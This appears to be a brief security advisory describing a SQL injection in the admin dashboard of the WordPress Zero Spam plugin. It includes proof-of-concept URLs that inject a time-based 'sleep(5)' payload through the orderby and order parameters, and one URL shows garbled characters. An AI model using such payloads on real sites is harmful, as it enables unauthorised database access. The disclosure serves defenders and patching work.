The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection
With at least one IP in the “Blocked IPs” list: https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab;=blocked&orderby;=1 and sleep(5) https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab;=blocked&orderby;=date_addedℴ=+and+sleep(5)